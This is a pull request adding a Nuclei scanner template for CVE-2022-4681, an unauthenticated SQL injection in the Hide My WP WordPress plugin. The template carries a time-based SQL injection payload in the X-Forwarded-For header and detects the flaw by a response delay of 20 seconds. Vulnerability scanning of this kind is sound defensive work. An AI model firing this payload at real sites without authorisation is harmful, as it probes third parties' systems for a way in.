### PR TITLE
add cve-2022-4681

### DIFF
--- a/http/cves/2022/CVE-2022-4681.yaml
+++ b/http/cves/2022/CVE-2022-4681.yaml
@@ -1,0 +1,26 @@
+id: CVE-2022-4681
+info:
+  name: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi
+  author: Kazgangap
+  severity: high
+  description: |
+    The Hide My WP WordPress plugin before 6.2.9 does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4681/
+    - https://www.exploit-db.com/exploits/51871
+    - https://wpscan.com/vulnerability/5a4096e8-abe4-41c4-b741-c44e740e8689/
+  tags: cve,cve2022,wp-plugin,sqli,wordpress
+http:
+  - method: GET
+    path:
+      - "{{baseURL}}"
+    headers:
+      X-Forwarded-For: "127.0.0.1'+(select*from(select(sleep(20)))a)+'"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: dsl
+        dsl:
+          - 'duration>=20'


### PR DESCRIPTION
### Template / PR Information

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

Added CVE-2022-4681
- References:
https://www.exploit-db.com/exploits/51871
https://nvd.nist.gov/vuln/detail/CVE-2022-4681
https://wpscan.com/vulnerability/5a4096e8-abe4-41c4-b741-c44e740e8689/


### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)